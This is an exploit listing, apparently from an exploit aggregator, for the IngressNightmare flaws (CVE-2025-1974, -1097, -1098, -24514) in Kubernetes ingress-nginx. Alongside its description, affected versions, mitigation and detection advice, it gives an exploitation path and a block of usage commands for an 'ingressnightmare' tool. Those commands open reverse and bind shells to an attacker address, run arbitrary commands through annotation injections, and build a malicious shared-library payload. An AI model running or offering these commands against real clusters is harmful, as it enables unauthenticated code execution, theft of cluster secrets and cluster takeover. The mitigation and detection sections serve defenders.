Exploit for CVE-2025-1974 CVE-2025-1098 CVE-2025-1974 CVE-2025-24514 CVE-2025-1097

Name: Exploit for CVE-2025-1974 CVE-2025-1098 CVE-2025-1974 CVE-2025-24514 CVE-2025-1097
Rating: 5 (18 reviews)
2025-06-26 | CVSS 9.8
## https://sploitus.com/exploit?id=D8023DE3-F833-5D77-BBE5-8E0FD820EEDE
# IngressNightmare: CVE-2025-1974 - Unauthenticated Remote Code Execution Vulnerabilities in Ingress NGINX 👻

# 🧾 Description:

This vulnerability allows remote attackers to execute arbitrary code on affected installations of kubernetes/ingress-nginx. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of HTTP requests.

It is triggered by sending two request. One is a long buffered request to the NGINX server in same pod, then nginx will cache it as a temporary file. The second request is a request to the admission validating webhook server, which will trigger the admission webhook to write a temporary nginx config which contains the `ssl_engine` `badso_location`; directive. Then the admission webhook will run `nginx -t` to check the config, which will triggered remote code execution in the context of the NGINX server.


# 🎯 Impact:

CVSS v3.1 score: 9.8 (Critical ⚫️)

+ Attackers gain the ability to load shared libraries, achieve RCE within the ingress-nginx pod, and access all cluster secrets, potentially leading to cluster takeover.

+ It's part of a family dubbed IngressNightmare, which includes four other related flaws with similar injection capabilities 

# ✅ Affected Versions:

## Versions affected:

+ All versions < v1.11.0
+ v1.11.0 – v1.11.4
+ v1.12.0

Patched in:

+v1.11.5
+v1.12.1 and newer 

# 🚨 Exploitation Path:

1 . Upload a malicious .so file using a large HTTP POST to trigger NGINX’s client-body buffering.

2 . Use a crafted AdmissionReview with injection via annotations to load the file using ssl_engine.

3 . Trigger nginx -t, which loads the library, leading to remote code execution in the controller pod 


# 🔧 Mitigation Steps:


1. Upgrade Immediately

+ Upgrade to v1.11.5 or v1.12.1+ of ingress-nginx 

2. Temporary Workarounds (if patching isn’t possible yet)

+ Disable the admission webhook:

+ Helm users: controller.admissionWebhooks.enabled=false

+ Manual installs: remove --validating-webhook and delete ValidatingWebhookConfiguration

+ Restrict network access: stop pods from reaching the admission webhook via network policies; ideally only allow access from kube-apiserver 


# 🔍 Detection & Monitoring

+ Look for use of ssl_engine or unusual NGINX commands in webhook logs.

+ Use audit trails to check for suspicious AdmissionReview requests.

+ Run Nuclei detection templates to scan externally or internally for vulnerable setups 



# ✅ Summary:

CVE‑2025‑1974 is a severe RCE vulnerability in ingress-nginx’s admission controller that enables unauthenticated pod‑to‑pod attacks resulting in full cluster compromise. The fix is straightforward: upgrade to v1.11.5 or v1.12.1+, or disable/restrict the validating admission webhook. If you manage Kubernetes clusters, treat this as a high urgency patch and remediation effort.

# 💀 Exploitation:

```
# reverse shell 
./ingressnightmare -m r -r ${ur_ip} -p ${port} -i ${INGRESS} -u ${UPLOADER} 

# bind shell # maybe lost?
./ingressnightmare -m b -b ${port} -i ${INGRESS} -u ${UPLOADER} 

# blind command execution
./ingressnightmare -m c  -c 'date >> /tmp/pwn; echo eson pwn >> /tmp/pwn' -i ${INGRESS} -u ${UPLOADER} 

# for CVE-2025-24514 - auth-url injection
# This is the default mode
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-auth-url 
# same as 
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER}
 
# for CVE-2025-1097 - auth-tls-match-cn injection,
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-match-cn --auth-secret-name ${secret_name}

# for CVE-2025-1098 – mirror UID injection -- all available
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-mirror-uid 

## Advanced usage
# Send only admission request
./ingressnightmare -m c -i ${INGRESS} --only-admission --only-admission-file /tmp/evil.so # --is-auth-url # --is-match-cn # --is-mirror-uid ...

# Send only upload request loop
./ingressnightmare -m c -c "your command" -u ${UPLOADER} --only-upload

# dry run mode
## dry run to lookup payload so
./ingressnightmare -m c -c 'your command' -u ${UPLOADER} --dry-run 
# dump with > /tmp/evil.so

## dry run to lookup raw nginx admission 
./ingressnightmare -m c -i ${INGRESS} --only-admission --only-admission-file /tmp/evil.so --dry-run # --is-auth-url # --is-match-cn # --is-mirror-uid ...

## verbose mode
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} -v # debug 
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} -vv # trace
./ingressnightmare -vv # -i ${INGRESS} -u ${UPLOADER} # -m c -c 'your command'

## if get error like Exec format error, that means the payload is not compatible with the target system.
## It maybe caused by the target system is arm64, but the payload is x86_64.
## Also the libc version and kernel version may cause this error.
## This exp Works on 5.10 kernel without libc.
## recompile c
./ingressnightmare show-c > exp.c
gcc -fPIC -nostdlib -ffreestanding -fno-builtin -o danger.so exp.c -shared
./ingresnightmare -m c -c 'your command' --so ./danger.so -i ${INGRESS} -u ${UPLOADER}
```

# ⚠️ Disclaimer:

For educational and research purposes only. Use only against systems you own or have permission to test.